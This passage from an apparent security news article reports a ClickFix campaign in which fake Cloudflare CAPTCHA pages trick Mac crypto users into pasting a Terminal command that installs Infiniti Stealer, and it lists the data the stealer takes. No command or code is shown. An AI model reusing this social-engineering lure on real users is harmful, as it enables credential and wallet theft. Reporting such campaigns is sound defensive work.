CAPTCHA and Burn: Fake Cloudflare Checks Deliver Infiniti Stealer to Mac-Loving Crypto Users

If you use a Mac and own crypto, bad news just landed in your Terminal—and no, it's not another airdrop scam asking for your seed phrase.

Security researchers at Malwarebytes have uncovered a new campaign hitting crypto users with fake Cloudflare CAPTCHA pages. The scheme delivers a fresh infostealer creatively called Infiniti Stealer (also spotted as Infinite Stealer), built specifically to drain crypto wallet data from macOS systems. Someone at the threat actor desk definitely gets a C+ for creativity in malware naming.

Here's how it works: You land on what looks like a legitimate Cloudflare human verification page at update-check[.]com. You click the fake CAPTCHA. Then the page instructs you to open Terminal and paste a command. You know, just like Cloudflare has always done. Right.

That command? Not verification. It's a hidden installer script that quietly downloads and runs the malware while you wonder why your Mac is being so cooperative. Your Mac is not being helpful. Your Mac is being owned.

This is a ClickFix attack—pure social engineering. Instead of exploiting a vulnerability, hackers simply convince you to do their dirty work for them. The user executes the command, bypassing traditional defenses entirely. No pop-ups. No warnings. Just silent installation. Your antivirus is watching a closed door while the attacker walks in through the window you personally opened.

Once onboard, Infiniti Stealer gets hungry. It steals crypto wallet data, browser credentials, macOS Keychain secrets, plaintext developer files, and screenshots. It even checks if it's running in a sandbox or analysis environment to avoid detection. Stolen data gets exfiltrated to the attacker's server, Telegram notifications alert the operator when extraction finishes, and captured credentials get queued for server-side password cracking. This thing is basically running a SaaS on your machine—with better UX than most legitimate crypto products.

The malware is compiled into a native macOS binary, making it trickier to analyze than a simple Python script. So for all you reverse engineers out there, have fun with that.

This isn't the first macOS rode